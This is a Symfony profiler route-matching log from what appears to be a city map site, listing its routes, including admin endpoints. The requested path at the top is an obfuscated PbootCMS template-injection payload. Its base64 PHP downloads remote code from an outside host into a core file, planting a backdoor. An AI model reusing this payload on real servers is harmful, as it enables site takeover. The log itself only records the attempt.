
(none) Matched route

Route Matching Logs

Path to match: /rutmap/points/getInfoByURL/LOC/%2F%7Bpboot%3Aif%28%28%22file_put_co%22.%22ntents%22%29%28%22temp.php%22%2C%28%22base6%22.%224_decode%22%29%28%22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCcuL2NvcmUvYmFzaWMvZnVuLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9kLnNvZ291YWQudmlwL3R4dC9waHA4MjIudHh0JykpOwplY2hvICd0ZW1wMTExODg4JzsKdW5saW5rKF9fRklMRV9fKTs%3D%22%29%29%29%7D%7B%2Fpboot%3Aif%7D%2F..%2F..%2F%3Fp%3D20
# Route name Path Log
1 _preview_error /_error/{code}.{_format} Path does not match
2 _wdt /_wdt/{token} Path does not match
3 _profiler_home /_profiler/ Path does not match
4 _profiler_search /_profiler/search Path does not match
5 _profiler_search_bar /_profiler/search_bar Path does not match
6 _profiler_phpinfo /_profiler/phpinfo Path does not match
7 _profiler_search_results /_profiler/{token}/search/results Path does not match
8 _profiler_open_file /_profiler/open Path does not match
9 _profiler /_profiler/{token} Path does not match
10 _profiler_router /_profiler/{token}/router Path does not match
11 _profiler_exception /_profiler/{token}/exception Path does not match
12 _profiler_exception_css /_profiler/{token}/exception.css Path does not match
13 admin_get_regions /admin/getRegions/{data} Path does not match
14 admin_get_objects /admin/getObjects/{data} Path does not match
15 admin_get_street_views /admin/getStreetviews/{data} Path does not match
16 admin_get_events /admin/getEvents/{data} Path does not match
17 admin_get_municipality /admin/getMunicipality/{data} Path does not match
18 admin_get_tag /admin/getTag/{data} Path does not match
19 admin_get_object /admin/getObject/{data} Path does not match
20 admin_get_street_view /admin/getStreetview/{data} Path does not match
21 admin_get_rand_object /admin/getRandObject Path does not match
22 admin_get_event /admin/getEvent/{data} Path does not match
23 admin_get_region /admin/getRegion/{data} Path does not match
24 admin_get_street /admin/getStreet/{data} Path does not match
25 admin_get_cities /admin/getCities/{data} Path does not match
26 admin_get_countries /admin/getCountries/{data} Path does not match
27 admin_get_municipalities /admin/getMunicipalities/{data} Path does not match
28 admin_get_categories /admin/getCategories Path does not match
29 admin_get_event_categories /admin/getEventCategories Path does not match
30 admin_get_streets /admin/getStreets/{data} Path does not match
31 admin_get_tags /admin/getTags Path does not match
32 admin_add_municipality /admin/addMunicipality Path does not match
33 admin_add_tag /admin/addTag Path does not match
34 admin_object /admin/addObject Path does not match
35 admin_street_view /admin/addStreetview Path does not match
36 admin_event /admin/addEvent Path does not match
37 admin_add_region /admin/addRegion Path does not match
38 admin_add_street /admin/addStreet Path does not match
39 admin_del_municipality /admin/delMunicipality Path does not match
40 admin_del_tag /admin/delTag Path does not match
41 admin_del_event /admin/delEvent Path does not match
42 admin_del_object /admin/delObject Path does not match
43 admin_del_streetview /admin/delStreetview Path does not match
44 admin_del_street /admin/delStreet Path does not match
45 admin_del_region /admin/delRegion Path does not match
46 create_sitemap /points/createSiteMap/{id} Path does not match
47 main_home /.well-known/acme-challenge/{id} Path does not match
48 create_sitemaps /points/createSiteMaps Path does not match
49 get_info_by_url /points/getInfoByURL/{lang}/{data} Path does not match
50 send_mail /points/sendMail/{name}/{email}/{msg} Path does not match
51 get_categories /points/getCategories/{lang} Path does not match
52 get_categoriesCSS /categories.css Path does not match
53 get_categoriesNewCSS /categoriesNew.css Path does not match
54 get_points_json /points/getPointsJson/{lang}/{data} Path does not match
55 get_transport_line /points/getTransportLines/{lang}/{id} Path does not match
56 get_street_points /points/getStreetPoints/{lang}/{pid} Path does not match
57 get_events /points/getEvents/{lang}/{date}/{city} Path does not match
58 get_hotspot_points /points/getHotspotPoints/{id} Path does not match
59 suggst_object /points/suggestObject Path does not match
60 get_points /points/getPoints/{lang}/{data} Path does not match
61 get_all_points /points/getAllPoints/{lang} Path does not match
62 get_hotspots /points/getHotspots/{lang}/{data} Path does not match
63 get_sff /points/getSFF/{lang} Path does not match
64 get_visit_sarajevo /points/getVisitSarajevo/{lang} Path does not match
65 get_greens /points/getGreens/{lang}/{data} Path does not match
66 get_greens_all /points/getGreensAll/{llat}/{llng}/{rlat}/{rlng} Path does not match
67 get_greens_all_json /points/getGreensAllJson/{LBlat}/{LBlng}/{RBlat}/{RBlng}/{city} Path does not match
68 get_streets /points/getStreets/{lang} Path does not match
69 get_all_streets_greens /points/getAllStreetsGreens/{lang}/{city} Path does not match
70 get_streets_list /points/getStreetsList/{lang}/{city} Path does not match
71 get_details /points/getDetails/{lang}/{id} Path does not match
72 get_details_hotspot /points/getDetailsHotspot/{lang}/{id} Path does not match
73 get_details_event /points/getDetailsEvent/{lang}/{pid}/{eid} Path does not match
74 search_object /points/searchObject/{lang}/{data}/{city} Path does not match
75 search_hotspot /points/searchHotspot/{lang}/{data}/{city} Path does not match
76 search_street /points/searchStreet/{lang}/{data}/{city} Path does not match
77 get_main_hotspots /points/getMainHotspots Path does not match
78 get_mapillary_point /points/getMapillaryPoint/{bounderies}/lat/{lat}/lng/{lng} Path does not match
79 get_outer_pano /points/outerGetPano/{lang}/{pid} Path does not match

Note: These matching logs are based on the current router configuration, which might differ from the configuration used when profiling this request.